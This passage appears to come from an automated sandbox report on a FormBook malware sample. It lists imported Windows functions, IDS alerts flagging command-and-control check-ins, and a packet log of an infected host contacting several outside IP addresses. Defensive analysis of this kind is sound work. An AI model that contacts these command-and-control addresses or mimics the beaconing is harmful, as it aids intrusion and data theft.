                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                              2024-07-21T13:32:06.994854+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54971780192.168.2.7188.114.97.3
                                              2024-07-21T13:33:33.452707+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974180192.168.2.7148.135.97.125
                                              2024-07-21T13:34:00.273875+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974980192.168.2.73.33.130.190
                                              2024-07-21T13:32:39.957553+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972580192.168.2.7188.114.96.3
                                              2024-07-21T13:32:53.501283+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972980192.168.2.7203.161.41.207
                                              2024-07-21T13:31:53.199532+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54971380192.168.2.73.33.130.190
                                              2024-07-21T13:33:46.714145+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974580192.168.2.73.33.130.190
                                              2024-07-21T13:32:21.613906+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972180192.168.2.7103.168.172.37
                                              2024-07-21T13:31:10.500548+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54970480192.168.2.73.33.130.190
                                              2024-07-21T13:33:06.685839+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973380192.168.2.784.32.84.32
                                              2024-07-21T13:34:32.188050+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54975380192.168.2.784.32.84.32
                                              2024-07-21T13:31:39.802184+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54970980192.168.2.776.223.67.189
                                              2024-07-21T13:33:19.877840+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973780192.168.2.713.248.169.48

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 21, 2024 13:31:10.011270046 CEST4970480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:10.018220901 CEST80497043.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:10.018337011 CEST4970480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:10.021895885 CEST4970480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:10.030376911 CEST80497043.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:10.500219107 CEST80497043.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:10.500431061 CEST80497043.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:10.500547886 CEST4970480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:10.512511969 CEST4970480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:10.517385960 CEST80497043.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:30.610490084 CEST4970680192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:30.615523100 CEST804970676.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:30.615607023 CEST4970680192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:30.617557049 CEST4970680192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:30.622436047 CEST804970676.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:31.076571941 CEST804970676.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:31.076673031 CEST4970680192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:32.129621029 CEST4970680192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:32.134776115 CEST804970676.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:33.148159027 CEST4970780192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:33.153172970 CEST804970776.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:33.153278112 CEST4970780192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:33.155786037 CEST4970780192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:33.160717010 CEST804970776.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:33.623838902 CEST804970776.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:33.623975039 CEST4970780192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:34.660857916 CEST4970780192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:34.666050911 CEST804970776.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:35.679866076 CEST4970880192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:36.023798943 CEST804970876.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:36.023922920 CEST4970880192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:36.025886059 CEST4970880192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:36.031075001 CEST804970876.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:36.031085014 CEST804970876.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:36.504559040 CEST804970876.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:36.504637957 CEST4970880192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:37.535896063 CEST4970880192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:37.540946007 CEST804970876.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:38.555609941 CEST4970980192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:39.324007988 CEST804970976.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:39.324139118 CEST4970980192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:39.326219082 CEST4970980192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:39.331191063 CEST804970976.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:39.801973104 CEST804970976.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:39.802023888 CEST804970976.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:39.802184105 CEST4970980192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:39.804696083 CEST4970980192.168.2.776.223.67.189
                                              Jul 21, 2024 13:31:39.809655905 CEST804970976.223.67.189192.168.2.7
                                              Jul 21, 2024 13:31:44.841401100 CEST4971080192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:44.846329927 CEST80497103.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:44.846453905 CEST4971080192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:44.848642111 CEST4971080192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:44.853617907 CEST80497103.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:45.332978010 CEST80497103.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:45.333100080 CEST4971080192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:46.364126921 CEST4971080192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:46.369267941 CEST80497103.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:47.382407904 CEST4971180192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:47.387451887 CEST80497113.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:47.387572050 CEST4971180192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:47.389334917 CEST4971180192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:47.394355059 CEST80497113.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:47.845068932 CEST80497113.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:47.845190048 CEST4971180192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:48.895476103 CEST4971180192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:48.900501013 CEST80497113.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:49.914279938 CEST4971280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:50.184567928 CEST80497123.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:50.184727907 CEST4971280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:50.187031031 CEST4971280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:50.192106962 CEST80497123.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:50.192271948 CEST80497123.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:50.676467896 CEST80497123.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:50.676739931 CEST4971280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:51.692318916 CEST4971280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:51.874970913 CEST80497123.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:52.710349083 CEST4971380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:52.715466022 CEST80497133.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:52.715666056 CEST4971380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:52.717626095 CEST4971380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:52.722580910 CEST80497133.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:53.199148893 CEST80497133.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:53.199189901 CEST80497133.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:53.199532032 CEST4971380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:53.202315092 CEST4971380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:31:53.207242966 CEST80497133.33.130.190192.168.2.7
                                              Jul 21, 2024 13:31:58.270678997 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:31:58.277187109 CEST8049714188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:31:58.277360916 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:31:58.279372931 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:31:58.284353018 CEST8049714188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:31:58.865998030 CEST8049714188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:31:58.866065025 CEST8049714188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:31:58.866136074 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:31:58.866976023 CEST8049714188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:31:58.867042065 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:31:59.785866022 CEST4971480192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:00.916435957 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:00.921459913 CEST8049715188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:00.925389051 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:00.990570068 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:00.995476961 CEST8049715188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:01.508244991 CEST8049715188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:01.508265972 CEST8049715188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:01.508363008 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:01.508661985 CEST8049715188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:01.508711100 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:02.520282030 CEST4971580192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:03.833182096 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:03.891288042 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:03.891513109 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:03.893337011 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:03.898231983 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:03.898552895 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:04.501538038 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:04.501636982 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:04.501735926 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:04.501883984 CEST8049716188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:04.504580975 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:05.395334959 CEST4971680192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:06.413572073 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:06.418679953 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.418785095 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:06.420315027 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:06.425324917 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.994693995 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.994718075 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.994730949 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.994853973 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:06.995136023 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:06.995187044 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:07.115598917 CEST4971780192.168.2.7188.114.97.3
                                              Jul 21, 2024 13:32:07.120883942 CEST8049717188.114.97.3192.168.2.7
                                              Jul 21, 2024 13:32:12.325649023 CEST4971880192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:12.330571890 CEST8049718103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:12.330698013 CEST4971880192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:12.332983017 CEST4971880192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:12.338313103 CEST8049718103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:13.847666025 CEST8049718103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:13.847695112 CEST8049718103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:13.847765923 CEST4971880192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:13.849029064 CEST4971880192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:14.867351055 CEST4971980192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:15.049582958 CEST8049719103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:15.049813032 CEST4971980192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:15.051909924 CEST4971980192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:15.056971073 CEST8049719103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:15.734257936 CEST8049719103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:15.734364986 CEST8049719103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:15.734570026 CEST4971980192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:16.576523066 CEST4971980192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:17.602922916 CEST4972080192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:17.607948065 CEST8049720103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:17.608669996 CEST4972080192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:17.611635923 CEST4972080192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:17.616719007 CEST8049720103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:17.616730928 CEST8049720103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:18.070393085 CEST8049720103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:18.071032047 CEST8049720103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:18.071099043 CEST4972080192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:19.114423990 CEST4972080192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:20.133308887 CEST4972180192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:20.138500929 CEST8049721103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:20.138612032 CEST4972180192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:20.140944958 CEST4972180192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:20.146056890 CEST8049721103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:21.613616943 CEST8049721103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:21.613657951 CEST8049721103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:21.613905907 CEST4972180192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:21.616673946 CEST4972180192.168.2.7103.168.172.37
                                              Jul 21, 2024 13:32:21.622596025 CEST8049721103.168.172.37192.168.2.7
                                              Jul 21, 2024 13:32:31.839251041 CEST4972280192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:31.844358921 CEST8049722188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:31.844449997 CEST4972280192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:31.846313953 CEST4972280192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:31.851691008 CEST8049722188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:32.308267117 CEST8049722188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:32.308649063 CEST8049722188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:32.308701992 CEST4972280192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:33.350327015 CEST4972280192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:34.368228912 CEST4972380192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:34.413605928 CEST8049723188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:34.413707018 CEST4972380192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:34.415971041 CEST4972380192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:34.420847893 CEST8049723188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:34.870908976 CEST8049723188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:34.870930910 CEST8049723188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:34.871006966 CEST4972380192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:35.926651955 CEST4972380192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:36.945458889 CEST4972480192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:36.950392962 CEST8049724188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:36.950591087 CEST4972480192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:36.952569962 CEST4972480192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:36.957484961 CEST8049724188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:36.957560062 CEST8049724188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:37.409792900 CEST8049724188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:37.409832001 CEST8049724188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:37.409918070 CEST4972480192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:38.457988977 CEST4972480192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.477821112 CEST4972580192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.482975960 CEST8049725188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:39.483086109 CEST4972580192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.485057116 CEST4972580192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.490034103 CEST8049725188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:39.957283020 CEST8049725188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:39.957314014 CEST8049725188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:39.957552910 CEST4972580192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.962198019 CEST4972580192.168.2.7188.114.96.3
                                              Jul 21, 2024 13:32:39.967813969 CEST8049725188.114.96.3192.168.2.7
                                              Jul 21, 2024 13:32:45.300031900 CEST4972680192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:45.306682110 CEST8049726203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:45.306858063 CEST4972680192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:45.309068918 CEST4972680192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:45.314022064 CEST8049726203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:45.917604923 CEST8049726203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:45.917733908 CEST8049726203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:45.917813063 CEST4972680192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:46.818283081 CEST4972680192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:47.836342096 CEST4972780192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:47.841567039 CEST8049727203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:47.844321012 CEST4972780192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:47.846599102 CEST4972780192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:47.851497889 CEST8049727203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:48.445993900 CEST8049727203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:48.446018934 CEST8049727203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:48.446104050 CEST4972780192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:49.349642038 CEST4972780192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:50.368477106 CEST4972880192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:50.373651981 CEST8049728203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:50.373739958 CEST4972880192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:50.375916958 CEST4972880192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:50.385127068 CEST8049728203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:50.385149002 CEST8049728203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:51.011807919 CEST8049728203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:51.011846066 CEST8049728203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:51.012598038 CEST4972880192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:51.880141020 CEST4972880192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:52.899883986 CEST4972980192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:52.904885054 CEST8049729203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:52.904983044 CEST4972980192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:52.907337904 CEST4972980192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:52.912157059 CEST8049729203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:53.501008034 CEST8049729203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:53.501038074 CEST8049729203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:53.501282930 CEST4972980192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:53.505634069 CEST4972980192.168.2.7203.161.41.207
                                              Jul 21, 2024 13:32:53.510514021 CEST8049729203.161.41.207192.168.2.7
                                              Jul 21, 2024 13:32:58.604017019 CEST4973080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:32:58.610951900 CEST804973084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:32:58.611037016 CEST4973080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:32:58.613533020 CEST4973080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:32:58.620208025 CEST804973084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:32:59.089325905 CEST804973084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:32:59.089783907 CEST4973080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:00.129899979 CEST4973080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:00.135072947 CEST804973084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:01.148371935 CEST4973180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:01.153331995 CEST804973184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:01.153740883 CEST4973180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:01.157653093 CEST4973180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:01.162656069 CEST804973184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:01.620652914 CEST804973184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:01.623905897 CEST4973180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:02.670425892 CEST4973180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:02.675415993 CEST804973184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:03.680569887 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:03.685748100 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:03.687371016 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:03.689584970 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:03.694807053 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:03.694818974 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:04.174477100 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:04.174568892 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:05.192507982 CEST4973280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:05.197483063 CEST804973284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.212553978 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.217700958 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.217787981 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.219988108 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.225527048 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685714960 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685775995 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685813904 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685838938 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.685847998 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685884953 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.685899973 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.685940027 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686018944 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.686073065 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686110020 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686155081 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.686162949 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686197996 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:06.686248064 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.690665007 CEST4973380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:33:06.695693970 CEST804973384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:33:11.736215115 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.741380930 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:11.741466999 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.743964911 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:11.748837948 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:12.221828938 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:12.221898079 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:13.270700932 CEST4973480192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:13.275759935 CEST804973413.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.291534901 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.299966097 CEST804973513.248.169.48192.168.2.7
